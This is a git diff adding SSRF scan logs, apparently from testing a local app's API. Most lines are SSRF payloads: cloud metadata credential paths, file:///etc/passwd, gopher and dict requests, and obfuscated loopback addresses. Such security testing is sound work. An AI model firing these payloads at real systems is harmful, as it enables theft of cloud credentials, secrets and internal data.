`http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/auth_test?url=localtest.me` +- Testing: `http://localhost:4200/api/auth_test?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/auth_test?url=127.127.127.127` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f000001` +- Testing: `http://localhost:4200/api/auth_test?url=017700000001` +- Testing: `http://localhost:4200/api/auth_test?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/auth_test?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/auth_test?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254` +- Testing: `http://localhost:4200/api/auth_test?url=2852039166` +- Testing: `http://localhost:4200/api/auth_test?url=7147006462` +- Testing: `http://localhost:4200/api/auth_test?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/auth_test?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/auth_test?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/auth_test?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/auth_test?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/auth_test?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/auth_test?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/auth_test?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/auth_test?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/auth_test?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/auth_test?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/auth_test?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.0` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/auth_test?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/auth_test?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/auth_test?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235521` +- Testing: `http://localhost:4200/api/auth_test?url=3232235777` +- Testing: `http://localhost:4200/api/auth_test?url=425.510.425.510` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=instance-data` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/auth_test?url=loopback` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/auth_test?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/auth_test?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/auth_test?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/auth_test?url=127.1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/auth_test?url=2130706433%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235521%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235777%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth_test?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth_test?url=0%2F` +- Testing: `http://localhost:4200/api/auth_test?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` + + #Test Summary +- Total endpoints tested: 25 +- Total payloads sent per endpoint: 321 +- SSRF hits: 321 +- Slow/Unresponsive requests: 0 + +# SSRF testing completed. diff --git a/src/ssrf/ssrf_logs/ssrf_test_results_2025-04-16_17-13-28.md b/src/ssrf/ssrf_logs/ssrf_test_results_2025-04-16_17-13-28.md new file mode 100644 index 00000000..198ef04e --- /dev/null +++ b/src/ssrf/ssrf_logs/ssrf_test_results_2025-04-16_17-13-28.md @@ -0,0 +1,8394 @@ +# SSRF Test Results +**Scan started on Wed Apr 16 17:13:28 AEST 2025** +**Target: http://localhost:4200** +**Request Method: POST** +**Max Time: 7 seconds** +**API Wordlist: api_endpoints.txt** +**Payload Wordlist: payloads.txt** + + +======================================================== + 😎 SSRF Mapping & Testing Script 😎 + Made with tears and possibly love by Ibi +======================================================== + + 🚀 #Starting SSRF testing for http://localhost:4200 +## Testing endpoint: http://localhost:4200/api/activity_types +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/activity_types?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/activity_types?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/activity_types?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/activity_types?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=127.1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=0` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/activity_types?url=127.127.127.127` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.1.3` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.0` +- Testing: `http://localhost:4200/api/activity_types?url=2130706433` +- Testing: `http://localhost:4200/api/activity_types?url=017700000001` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f000001` +- Testing: `http://localhost:4200/api/activity_types?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/activity_types?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/activity_types?url=google.com.localhost` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=localtest.me` +- Testing: `http://localhost:4200/api/activity_types?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/activity_types?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/activity_types?url=2130706433%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235521%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235777%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/activity_types?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/activity_types?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/activity_types?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/activity_types?url=0%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=localtest.me` +- Testing: `http://localhost:4200/api/activity_types?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1.nip.io` +- Testing: 